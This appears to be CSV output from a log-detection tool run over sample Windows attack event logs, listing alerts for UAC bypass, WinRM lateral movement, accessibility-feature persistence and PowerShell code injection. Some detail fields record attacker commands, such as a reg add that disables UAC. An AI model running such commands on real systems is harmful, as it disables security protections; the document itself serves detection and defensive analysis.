2019-05-14 11:32:48.359 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:48.359 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:51.143 +09:00,IEWIN7,1,informational,Process Creation,Command: consent.exe 968 288 03573528  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:51.453 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe""  :  Path: C:\Windows\System32\sysprep\sysprep.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:51.453 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:51.470 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe"" ""C:\Windows\System32\sysprep\sysprep.exe""   :  Path: C:\Windows\System32\sysprep\sysprep.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:51.470 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:51.487 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe""   :  Path: C:\Windows\System32\sysprep\sysprep.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:51.487 +09:00,IEWIN7,1,informational,Process Creation,Command: consent.exe 968 312 0197CDB0  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:51.487 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:51.814 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe""   :  Path: C:\Windows\System32\sysprep\sysprep.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:51.831 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe""  :  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\sysprep\sysprep.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:51.831 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 23:04:05.697 +09:00,alice.insecurebank.local,11,high,Hijack Legit RDP Session to Move Laterally,,rules/sigma/file_event/sysmon_tsclient_filewrite_startup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx
2019-05-15 02:17:26.440 +09:00,alice.insecurebank.local,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
2019-05-15 02:17:26.738 +09:00,alice.insecurebank.local,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
2019-05-15 13:18:40.474 +09:00,IEWIN7,13,high,Office Security Settings Changed,,rules/sigma/registry_event/sysmon_reg_office_security.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_sysmon_13_VBA_Security_AccessVBOM.evtx
2019-05-16 10:31:36.426 +09:00,DC1.insecurebank.local,1,informational,Process Creation,Command: C:\Windows\system32\WinrsHost.exe -Embedding  :  Path: C:\Windows\System32\winrshost.exe  :  User: insecurebank\Administrator  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx
2019-05-16 10:31:36.454 +09:00,DC1.insecurebank.local,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe /C ipconfig  :  Path: C:\Windows\System32\cmd.exe  :  User: insecurebank\Administrator  :  Parent Command: C:\Windows\system32\WinrsHost.exe -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx
2019-05-16 10:31:36.456 +09:00,DC1.insecurebank.local,1,informational,Process Creation,Command: ipconfig  :  Path: C:\Windows\System32\ipconfig.exe  :  User: insecurebank\Administrator  :  Parent Command: C:\Windows\system32\cmd.exe /C ipconfig,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx
2019-05-16 10:38:19.630 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: Lateral Movement - Windows Remote Management  :  Command: ""C:\Windows\system32\HOSTNAME.EXE""  :  Path: C:\Windows\System32\HOSTNAME.EXE  :  User: insecurebank\Administrator  :  Parent Command: C:\Windows\system32\wsmprovhost.exe -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx
2019-05-16 10:38:19.630 +09:00,DC1.insecurebank.local,1,medium,Remote PowerShell Session Host Process (WinRM),,rules/sigma/process_creation/win_remote_powershell_session_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx
2019-05-16 23:17:15.762 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1112,technique_name=Modify Registry  :  Command: reg  add hklm\software\microsoft\windows\currentversion\policies\system /v EnableLUA /t REG_DWORD /d 0x0 /f  :  Path: C:\Windows\System32\reg.exe  :  User: insecurebank\Administrator  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx
2019-05-17 01:08:34.867 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1015,technique_name=Accessibility Features  :  Command: ""C:\Windows\System32\osk.exe""    :  Path: C:\Windows\System32\osk.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx
2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1033,technique_name=System Owner/User Discovery  :  Command: whoami  :  Path: C:\Windows\System32\whoami.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ""C:\Windows\System32\osk.exe""  ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx
2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx
2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx
2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx
2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx
2019-05-19 02:16:08.348 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.176 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.176 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.208 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.208 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.223 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.223 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.255 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.255 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.270 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.270 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.286 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.286 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.317 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.317 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.333 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.333 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.348 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.348 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.364 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.364 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.380 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.380 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.395 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.395 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.411 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.411 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.426 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.426 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.458 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.458 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.473 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.473 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.489 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.489 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.505 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.505 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.520 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.520 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.536 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.536 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.551 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.551 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.567 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.567 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.583 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.583 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.598 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.598 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.614 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.614 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.630 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.630 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.661 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.661 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.692 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.692 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.708 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.708 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.723 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
